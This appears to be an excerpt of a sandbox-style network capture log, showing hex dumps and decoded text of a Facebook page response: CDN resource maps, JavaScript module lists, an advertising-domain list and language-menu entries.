2022-10-07 14:00:15 UTC	1245	IN	Data Raw: 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 73 56 46 6f 31 75 63 36 49 34 50 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 79 75 55 30 35 61 47 58 33 7a 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 52 57 4b 4f 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 Data Ascii: php\/v3\/yH\/l\/0,cross\/sVFo1uc6I4P.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/yuU05aGX3z5.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0RWKOAc":{"type":"js","src":"https:\/\/static.xx.f
2022-10-07 14:00:15 UTC	1246	IN	Data Raw: 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 6e 53 5a 37 34 46 46 2d 7a 79 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 59 65 33 48 37 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 77 4e 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5f 4a 47 43 51 67 35 6b 69 4c 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 30 Data Ascii: ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/nSZ74FF-zyM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"6Ye3H7E":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iewN4\/y_\/l\/en_US\/_JGCQg5kiLh.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Y0
2022-10-07 14:00:15 UTC	1248	IN	Data Raw: 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 78 5c 2f 41 67 70 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 7a 79 61 4b 33 56 44 67 5a 47 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 36 51 77 57 56 49 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e Data Ascii: fbcdn.net\/rsrc.php\/v3\/yv\/r\/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dx\/AgpO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/zyaK3VDgZGc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L6QwWVI":{"type":"css","src":"https:\/\/static.xx.fbcdn
2022-10-07 14:00:15 UTC	1249	IN	Data Raw: 68 6b 49 4b 57 6f 71 64 68 69 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 32 78 69 74 32 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4e 4f 56 34 5c 2f 79 57 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 50 39 45 4a 42 5f 5f 62 79 59 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4e 52 54 6c 6e 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 Data Ascii: hkIKWoqdhiL.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"s2xit2v":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNOV4\/yW\/l\/en_US\/P9EJB__byYG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iNRTlnq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y
2022-10-07 14:00:15 UTC	1251	IN	Data Raw: 22 4d 30 4c 31 44 6f 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 51 74 34 5c 2f 79 6d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 43 74 7a 4f 4d 6a 6b 72 62 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 32 39 55 5a 42 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 30 4f 58 63 78 4b 6d 35 69 42 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 Data Ascii: "M0L1Doa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3icQt4\/ym\/l\/en_US\/ACtzOMjkrbl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jj29UZB":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/0OXcxKm5iBu.js?_nc_x=Ij3Wp8lg5Kz","nc
2022-10-07 14:00:15 UTC	1252	IN	Data Raw: 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 34 6c 72 34 5c 2f 79 74 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 76 5f 4c 73 46 45 65 52 47 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 39 31 5a 56 4b 55 50 54 71 41 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 Data Ascii: dn.net\/rsrc.php\/v3i4lr4\/yt\/l\/en_US\/Sv_LsFEeRG8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/91ZVKUPTqAa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"https:\/\/static.x
2022-10-07 14:00:15 UTC	1254	IN	Data Raw: 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 70 51 5c 2f 69 66 58 75 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d Data Ascii: x2lrGAW","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7","RPLH8jg"],"be":1},"WebSpeedInteractionsTypedLogger":{"r":["pQ\/ifXu","8zbEZtu","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"AsyncRequest":{"r":["n6W4xMH","8zbEZtu","vGt2mxz","h3ZzAm
2022-10-07 14:00:15 UTC	1255	IN	Data Raw: 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 62 4b 43 6c 54 67 56 22 2c 22 6c 47 30 6f 48 42 43 22 2c 22 62 39 4b 5a 49 48 4a 22 2c 22 71 31 6a 53 5a 38 63 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 53 79 48 76 61 66 68 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 6a 31 76 63 68 56 64 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 43 51 57 57 67 50 76 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 52 58 55 68 43 47 Data Ascii: nowlift":{"r":["bKClTgV","lG0oHBC","b9KZIHJ","q1jSZ8c","D9XB3gj","diogVau","YtU3C5u","hIwA2W6","dAxX0jj","mRpDwmd","e9ANzw\/","SyHvafh","GDpvtK3","CGkH4FY","j1vchVd","Pd9Vjxl","CQWWgPv","zK\/REUV","43f2L+6","dHsJQ6y","srPmdt4","D1\/JTmT","zPLgIGT","RXUhCG
2022-10-07 14:00:15 UTC	1257	IN	Data Raw: 56 57 38 65 54 58 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6c 6c 34 5a 47 5c 2f 79 22 2c 22 4d 30 4c 31 44 6f 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6a 6a 32 39 55 5a 42 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 65 50 65 34 5a 52 36 22 2c 22 63 59 55 33 63 33 32 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 73 46 44 4a 68 68 77 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 68 63 36 4d 59 58 55 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 Data Ascii: VW8eTX","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","kS9TBvO","lWOvGTa","ll4ZG\/y","M0L1Doa","h3ZzAmG","OJ031e7","BIylKC4","jj29UZB","nAGRI4i","L8YcIon","ePe4ZR6","cYU3c32","Fn3rAl7","sFDJhhw","RPLH8jg","hc6MYXU","07JSiP0","dx\/AgpO"],"rds":{"m":["FbtLogging"
2022-10-07 14:00:15 UTC	1258	IN	Data Raw: 65 74 61 69 6c 73 44 69 61 6c 6f 67 41 73 79 6e 63 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 67 57 4d 4a 67 54 65 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 4f 66 66 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 47 6a 38 76 39 4c 34 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 Data Ascii: etailsDialogAsyncController":{"r":["gWMJgTe"],"be":1},"XOfferController":{"r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","hKY0QKT","Gj8v9L4","BIylKC4"],"r
2022-10-07 14:00:15 UTC	1260	IN	Data Raw: 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 49 6e 6c 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 5a 35 4c 46 32 6a 31 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 6e 36 57 34 78 4d 48 22 Data Ascii: Mm4GCm"],"be":1},"ContextualLayerInlineTabOrder":{"r":["Z5LF2j1","zPLgIGT","QMm4GCm","8zbEZtu","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7"],"be":1},"XUIDialogButton.react":{"r":["YtU3C5u","dAxX0jj","zK\/REUV","srPmdt4","R5w1rCJ","IaR\/6uP","QMm4GCm","n6W4xMH"
2022-10-07 14:00:15 UTC	1261	IN	Data Raw: 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 49 61 52 5c 2f 36 Data Ascii: script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","n6W4xMH","h3ZzAmG","dAxX0jj","cYU3c32","D1\/JTmT","Z2GjVu9","\/rO0lbn","lWOvGTa","diogVau","IaR\/6
2022-10-07 14:00:15 UTC	1263	IN	Data Raw: 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 0d 0a Data Ascii: "ads-encryption-url-exa
2022-10-07 14:00:15 UTC	1263	IN	Data Raw: 38 33 37 62 0d 0a 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 61 64 2e 61 74 64 6d 74 2e 63 6f 6d 22 2c 22 61 64 66 6f 72 6d 2e 6e 65 74 22 2c 22 61 64 31 33 2e 61 64 66 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37 5d 5d 2c 22 69 6e 73 74 61 6e 63 65 73 22 3a 5b 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 4b 32 22 2c 5b 22 53 65 6c 65 63 74 61 62 6c 65 4d 65 6e 75 22 2c 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 Data Ascii: 837bmple.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"instances":[["__inst_02182015_0_0_K2",["SelectableMenu","MenuSelectableItem","__markup_33
2022-10-07 14:00:15 UTC	1264	IN	Data Raw: 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 65 5f 44 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 2b 4f 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 65 75 74 73 63 68 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 Data Ascii: :"Dansk","title":"","className":"headerItem"},{"class":"headerItem","value":"de_DE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_2_+O"},"label":"Deutsch","title":"","className":"headerItem"},{"class":"headerIte
2022-10-07 14:00:15 UTC	1265	IN	Data Raw: 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 72 31 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4d 61 67 79 61 72 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 6c 5f 4e 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 6b 45 22 7d 2c 22 6c 61 62 65 6c Data Ascii: electableItem"},"markup":{"__m":"__markup_3310c079_0_9_r1"},"label":"Magyar","title":"","className":"headerItem"},{"class":"headerItem","value":"nl_NL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_a_kE"},"label
2022-10-07 14:00:15 UTC	1267	IN	Data Raw: 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 73 76 5f 53 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 5c 2f 75 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 76 65 6e 73 6b 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 76 69 5f 56 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f Data Ascii: "class":"headerItem","value":"sv_SE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_h_\/u"},"label":"Svenska","title":"","className":"headerItem"},{"class":"headerItem","value":"vi_VN","selected":false,"ctor":{"_
2022-10-07 14:00:15 UTC	1268	IN	Data Raw: 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 52 35 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a Data Ascii: selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_R5"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ctor":{"__m":
2022-10-07 14:00:15 UTC	1270	IN	Data Raw: 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 6f 4d 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 6b 46 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 Data Ascii: ected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_oM"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_kF","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight
